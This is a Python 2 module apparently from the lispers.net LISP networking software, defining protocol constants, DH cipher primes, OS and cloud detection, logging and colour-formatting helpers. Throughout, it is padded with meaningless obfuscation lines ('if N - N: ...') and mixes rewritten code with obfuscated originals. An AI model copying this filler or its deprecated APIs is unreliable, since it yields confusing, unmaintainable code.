LISP_TRACE_PORT = 2434

# Control-message type codes.
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9

# Map-Reply action codes.
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5

# Printable action names, indexed by the action codes above.
lisp_map_reply_action_string = ["no-action", "native-forward",
    "send-map-request", "drop-action", "policy-denied", "auth-failure"]

# Authentication algorithm IDs and digest lengths (bytes).
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32

# LCAF (LISP Canonical Address Format) type codes.
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16

# Record TTL values (units depend on use -- e.g. LISP_MR_TTL is 24*60).
LISP_MR_TTL = (24 * 60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_IGMP_TTL = 240

# Timer intervals and retry limits.
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = 5
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1

# RLOC-probing parameters.
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15

# Miscellaneous timeouts.
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180

# LISP-crypto cipher suites: suite IDs, plus Diffie-Hellman generator (G)
# and prime modulus (P) for the DH-based suites.
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3

LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF

LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6

# Bit masks for 32-, 64-, and 128-bit quantities.
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
def lisp_record_traceback(*args):
    """Uncaught-exception hook: append the last traceback to
    ./logs/lisp-traceback.log (timestamped) and also echo it to stdout.
    Installed via lisp_set_exception().
    """
    timestamp = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
    log_file = open("./logs/lisp-traceback.log", "a")
    log_file.write("---------- Exception occurred: {} ----------\n".format(
        timestamp))

    # Best effort: traceback.print_last() raises if no exception is pending.
    try:
        traceback.print_last(file=log_file)
    except:
        log_file.write("traceback.print_last(file=fd) failed")

    try:
        traceback.print_last()
    except:
        print("traceback.print_last() failed")

    log_file.close()
    return
if 73 - 73: O0 . OoOoOO00 + I1IiiI - I11i % I11i . I11i
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
if 28 - 28: I11i
if 58 - 58: OoOoOO00
if 37 - 37: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i
if 73 - 73: i11iIiiIii - IiII
if 25 - 25: OoooooooOO + IiII * I1ii11iIi11i
def lisp_set_exception ( ) :
    #
    # Install lisp_record_traceback() as the process-wide hook for uncaught
    # exceptions, so tracebacks land in ./logs/lisp-traceback.log.
    #
    sys . excepthook = lisp_record_traceback
    return
if 92 - 92: I1IiiI + I11i + O0 / o0oOOo0O0Ooo + I1Ii111
if 18 - 18: ooOoO0o * OoOoOO00 . iII111i / I1ii11iIi11i / i11iIiiIii
if 21 - 21: oO0o / I1ii11iIi11i + Ii1I + OoooooooOO
if 91 - 91: i11iIiiIii / i1IIi + iII111i + ooOoO0o * i11iIiiIii
if 66 - 66: iIii1I11I1II1 % i1IIi - O0 + I11i * I1Ii111 . IiII
if 52 - 52: ooOoO0o + O0 . iII111i . I1ii11iIi11i . OoO0O00
if 97 - 97: I1IiiI / iII111i
def lisp_is_raspbian():
    """Return True when running Raspbian: a Debian distribution on an
    ARM (armv6l/armv7l) machine. Uses platform.dist(), a Python-2 API.
    """
    return (platform.dist()[0] == "debian" and
        platform.machine() in ("armv6l", "armv7l"))
if 71 - 71: II111iiii / i1IIi . I1ii11iIi11i % OoooooooOO . OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu():
    """Return True when the distribution reported by platform.dist()
    (Python-2 API) is Ubuntu.
    """
    distro = platform.dist()[0]
    return (distro == "Ubuntu")
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora():
    """Return True when the distribution reported by platform.dist()
    (Python-2 API) is Fedora.
    """
    distro = platform.dist()[0]
    return (distro == "fedora")
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos():
    """Return True when the distribution reported by platform.dist()
    (Python-2 API) is CentOS.
    """
    distro = platform.dist()[0]
    return (distro == "centos")
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian():
    """Return True when the distribution reported by platform.dist()
    (Python-2 API) is Debian.
    """
    distro = platform.dist()[0]
    return (distro == "debian")
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali():
    """Return True when the distribution reported by platform.dist()
    (Python-2 API) is Kali.
    """
    distro = platform.dist()[0]
    return (distro == "Kali")
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos():
    """Return True when the OS kernel name from platform.uname() is Darwin
    (i.e. running on macOS).
    """
    kernel_name = platform.uname()[0]
    return (kernel_name == "Darwin")
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine():
    """Return True on Alpine Linux, detected by the presence of the
    /etc/alpine-release marker file.
    """
    return os.path.exists("/etc/alpine-release")
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86():
    """Return True when the CPU architecture is 32- or 64-bit x86."""
    arch = platform.machine()
    return (arch in ("x86", "i686", "x86_64"))
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux():
    """Return True when the OS kernel name from platform.uname() is Linux."""
    kernel_name = platform.uname()[0]
    return (kernel_name == "Linux")
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_on_aws():
    """Return True when the BIOS version string (via dmidecode) mentions
    Amazon -- heuristic for running on an AWS EC2 instance. Requires sudo
    and the Python-2 'commands' module.
    """
    bios_version = commands.getoutput("sudo dmidecode -s bios-version")
    return ("amazon" in bios_version.lower())
if 60 - 60: ooOoO0o * I1Ii111 + Oo0Ooo
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
def lisp_on_gcp():
    """Return True when the BIOS version string (via dmidecode) mentions
    Google -- heuristic for running on a GCP instance. Requires sudo and
    the Python-2 'commands' module.
    """
    bios_version = commands.getoutput("sudo dmidecode -s bios-version")
    return ("google" in bios_version.lower())
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
if 19 - 19: i11iIiiIii + iII111i % ooOoO0o
def lisp_process_logfile():
    """Redirect stdout to ./logs/lisp-<role>.log when the logfile has been
    rotated away (i.e. the expected file no longer exists), then reprint
    the startup banner into the fresh file.
    """
    logfile = "./logs/lisp-{}.log".format(lisp_log_id)
    if os.path.exists(logfile):
        return

    sys.stdout.close()
    sys.stdout = open(logfile, "a")

    lisp_print_banner(bold("logfile rotation", False))
    return
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
def lisp_i_am(name):
    """Record which LISP component this process is ("itr", "etr", "rtr",
    "mr", "ms", "ddt", or "core"): set the log id, raise the matching
    lisp_i_am_* role flag, and cache the short hostname (domain stripped).
    """
    global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
    global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
    global lisp_hostname

    lisp_log_id = name

    # Dispatch table replaces the original if-per-role chain; exactly one
    # module-level flag is raised for a recognized role name.
    role_flag = {"itr": "lisp_i_am_itr", "etr": "lisp_i_am_etr",
        "rtr": "lisp_i_am_rtr", "mr": "lisp_i_am_mr", "ms": "lisp_i_am_ms",
        "ddt": "lisp_i_am_ddt", "core": "lisp_i_am_core"}
    if name in role_flag:
        globals()[role_flag[name]] = True

    # Cache hostname with any domain suffix removed.
    lisp_hostname = socket.gethostname()
    dot = lisp_hostname.find(".")
    if dot != -1:
        lisp_hostname = lisp_hostname[0:dot]
    return
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
def lprint ( * args ) :
    #
    # Print one timestamped log line to stdout (Python-2 print statements;
    # trailing commas suppress newlines so the pieces join on one line).
    # Suppressed when lisp_debug_logging is False, unless the caller passes
    # the string "force" as an argument; "force" itself is not printed.
    #
    IIIiIi = ( "force" in args )
    if ( lisp_debug_logging == False and IIIiIi == False ) : return
    if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
    lisp_process_logfile ( )
    # Timestamp with millisecond precision (drop last 3 microsecond digits).
    Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
    Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
    print "{}: {}:" . format ( Oo0OO0000oooo , lisp_log_id ) ,
    if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
    # Print each argument except the "force" marker.
    for ii1I11 in args :
        if ( ii1I11 == "force" ) : continue
        print ii1I11 ,
    if 99 - 99: OOooOOo
    print ""
    if 45 - 45: oO0o - OOooOOo * I1Ii111 / Oo0Ooo * II111iiii - I1Ii111
    # Flush so log lines appear promptly; ignore failures (e.g. closed fd).
    try : sys . stdout . flush ( )
    except : pass
    return
if 83 - 83: OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
def dprint(*args):
    """Data-plane log line: forwards to lprint() only when the
    lisp_data_plane_logging flag is set; otherwise a no-op.
    """
    if not lisp_data_plane_logging:
        return
    lprint(*args)
    return
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
def debug ( * args ) :
    #
    # Print a highlighted ">>> ... <<<" debug line to stdout, timestamped,
    # unconditionally (no logging gate). Python-2 print statements; the
    # trailing commas keep the pieces on one line.
    #
    lisp_process_logfile ( )
    if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
    # Timestamp with millisecond precision (drop last 3 microsecond digits).
    Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
    Oo0OO0000oooo = Oo0OO0000oooo [ : - 3 ]
    if 8 - 8: o0oOOo0O0Ooo
    print red ( ">>>" , False ) ,
    print "{}:" . format ( Oo0OO0000oooo ) ,
    for ii1I11 in args : print ii1I11 ,
    print red ( "<<<\n" , False )
    # Flush so debug output appears promptly; ignore failures.
    try : sys . stdout . flush ( )
    except : pass
    return
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
def lisp_print_banner(string):
    """Log the lispers.net startup/rotation banner: caller-supplied tag,
    current time, software version (read once from lisp-version.txt via
    the Python-2 'commands' module), and bolded hostname.
    """
    global lisp_version, lisp_hostname

    # Lazily read the version file the first time a banner is printed.
    if lisp_version == "":
        lisp_version = commands.getoutput("cat lisp-version.txt")

    hostname = bold(lisp_hostname, False)
    lprint("lispers.net LISP {} {}, version {}, hostname {}".format(
        string, datetime.datetime.now(), lisp_version, hostname))
    return
if 65 - 65: Oo0Ooo / I11i
if 12 - 12: I11i % OoOoOO00
if 48 - 48: iII111i . i11iIiiIii
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
if 60 - 60: iIii1I11I1II1 + i1IIi
def green(string, html):
    """Render string in green: HTML <font> markup when html is True,
    otherwise ANSI escape codes (via bold()).
    """
    if html:
        return '<font color="green"><b>{}</b></font>'.format(string)
    return bold("\033[92m" + string + "\033[0m", html)
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
def green_last_sec(string):
    """Shorthand: render string green in HTML form."""
    return green(string, True)
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
def green_last_min(string):
    """Render *string* in a lighter green (#58D68D) bold HTML font."""
    return ('<font color="#58D68D"><b>{}</b></font>'.format(string))
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
def red(string, html):
    """Render *string* in red: HTML markup when html is true, otherwise
    an ANSI escape sequence wrapped via bold()."""
    if (html):
        return ('<font color="red"><b>{}</b></font>'.format(string))
    return (bold("\033[91m" + string + "\033[0m", html))
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
def blue(string, html):
    """Render *string* in blue: HTML markup when html is true, otherwise
    an ANSI escape sequence wrapped via bold()."""
    if (html):
        return ('<font color="blue"><b>{}</b></font>'.format(string))
    return (bold("\033[94m" + string + "\033[0m", html))
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
def bold(string, html):
    """Render *string* in bold: HTML <b> when html is true, otherwise the
    ANSI bold escape sequence."""
    if (html):
        return ("<b>{}</b>".format(string))
    return ("\033[1m" + string + "\033[0m")
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
def convert_font ( string ) :
    """Replace ANSI terminal color codes embedded in *string* with the
    equivalent HTML markup.

    Finds the first ANSI start code present ("[91m" red, "[92m" green,
    "[94m" blue, "[1m" bold), then repeatedly rewraps the text between
    that start code and the "[0m" terminator using the matching HTML
    helper (called with html=True). Makes one recursive pass if a bold
    code remains afterwards. Returns the rewritten string.
    """
    # Table of ANSI start-code -> HTML-producing helper function.
    iI11iiii1I = [ [ "[91m" , red ] , [ "[92m" , green ] , [ "[94m" , blue ] , [ "[1m" , bold ] ]
    iiiiI1iiiIi = "[0m"
    if 84 - 84: OOooOOo
    # Locate the first start code that occurs; remember its helper
    # (iii11), its length (i1) and its offset in the string (OO000o00).
    for o0OoO00 in iI11iiii1I :
        IIIIIiII1 = o0OoO00 [ 0 ]
        iii11 = o0OoO00 [ 1 ]
        i1 = len ( IIIIIiII1 )
        OO000o00 = string . find ( IIIIIiII1 )
        if ( OO000o00 != - 1 ) : break
    if 95 - 95: OoO0O00 . i1IIi / i11iIiiIii
    if 38 - 38: Oo0Ooo - I11i . Oo0Ooo
    # Rewrite every occurrence of that start code. NOTE(review): the
    # end-of-span slice advances by i1 (the start-code length, 4) rather
    # than len("[0m") -- presumably to also skip an adjacent escape byte;
    # verify against actual colored input.
    while ( OO000o00 != - 1 ) :
        ii1111i = string [ OO000o00 : : ] . find ( iiiiI1iiiIi )
        O0ooOO = string [ OO000o00 + i1 : OO000o00 + ii1111i ]
        string = string [ : OO000o00 ] + iii11 ( O0ooOO , True ) + string [ OO000o00 + ii1111i + i1 : : ]
        if 28 - 28: i11iIiiIii / o0oOOo0O0Ooo . iIii1I11I1II1 / II111iiii
        OO000o00 = string . find ( IIIIIiII1 )
    if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
    if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
    if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
    if 32 - 32: i11iIiiIii - I1Ii111
    if 53 - 53: OoooooooOO - IiII
    # A bold span may remain (e.g. nested inside a color span) -- recurse.
    if ( string . find ( "[1m" ) != - 1 ) : string = convert_font ( string )
    return ( string )
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
def lisp_space(num):
    """Return *num* repetitions of the spacer string."""
    return (" " * num)
if 65 - 65: o0oOOo0O0Ooo
if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
def lisp_button(string, url):
    """Return HTML for a rounded, transparent button labeled *string*.

    When *url* is provided the button is wrapped in an <a href> anchor
    and padded with spacer strings on both sides.
    """
    button = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'

    if (url == None):
        html = button + string + "</button>"
    else:
        anchor = '<a href="{}">'.format(url)
        pad = lisp_space(2)
        html = pad + anchor + button + string + "</button></a>" + pad
    return (html)
if 31 - 31: o0oOOo0O0Ooo
if 15 - 15: O0 / Oo0Ooo % I1ii11iIi11i + o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + O0
if 58 - 58: Oo0Ooo
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
